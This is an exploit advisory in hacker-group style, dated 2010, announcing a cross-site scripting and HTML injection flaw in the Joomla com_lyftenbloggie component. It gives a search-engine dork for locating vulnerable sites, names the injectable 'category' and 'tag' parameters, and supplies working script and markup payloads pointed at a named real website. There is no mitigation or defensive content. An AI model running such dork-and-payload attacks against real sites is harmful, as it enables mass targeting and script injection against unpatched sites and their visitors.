####################################################################
# Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability       #
####################################################################
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 ______           __                                             
/\  _  \         /\ \      __                                    
\ \ \L\ \    ____\ \ \___ /\_\  __  __     __      ___      __   
 \ \  __ \  /',__\\ \  _ `\/\ \/\ \/\ \  /'__`\  /' _ `\  /'__`\ 
  \ \ \/\ \/\__, `\\ \ \ \ \ \ \ \ \_\ \/\ \L\.\_/\ \/\ \/\  __/ 
   \ \_\ \_\/\____/ \ \_\ \_\ \_\/`____ \ \__/.\_\ \_\ \_\ \____\
    \/_/\/_/\/___/   \/_/\/_/\/_/`/___/> \/__/\/_/\/_/\/_/\/____/
                                    /\___/                       
                                    \/__/                        
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
####################################################################
# Name: Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability

# Vendor: http://www.lyften.com/products/lyften-bloggie.html

# Date: 2010-12-16

# Author: Ashiyane Digital Security Team

# Contact: XroGuE ~> Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com

# Home: www.Ashiyane.org/forums/ 

# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !

####################################################################
 
[+] Dork: inurl:"index.php?option=com_lyftenbloggie"
 
####################################################################
 
[+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&category=[XSS/HTML]
[+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&tag=[XSS/HTML]


[+] XSS: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<script>var XroG= String.fromCharCode(88, 114, 111, 71, 117, 69);alert(XroG)</script>
 

[+] HTML: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<marquee><font color=Blue size=15>XroGuE</font></marquee>

####################################################################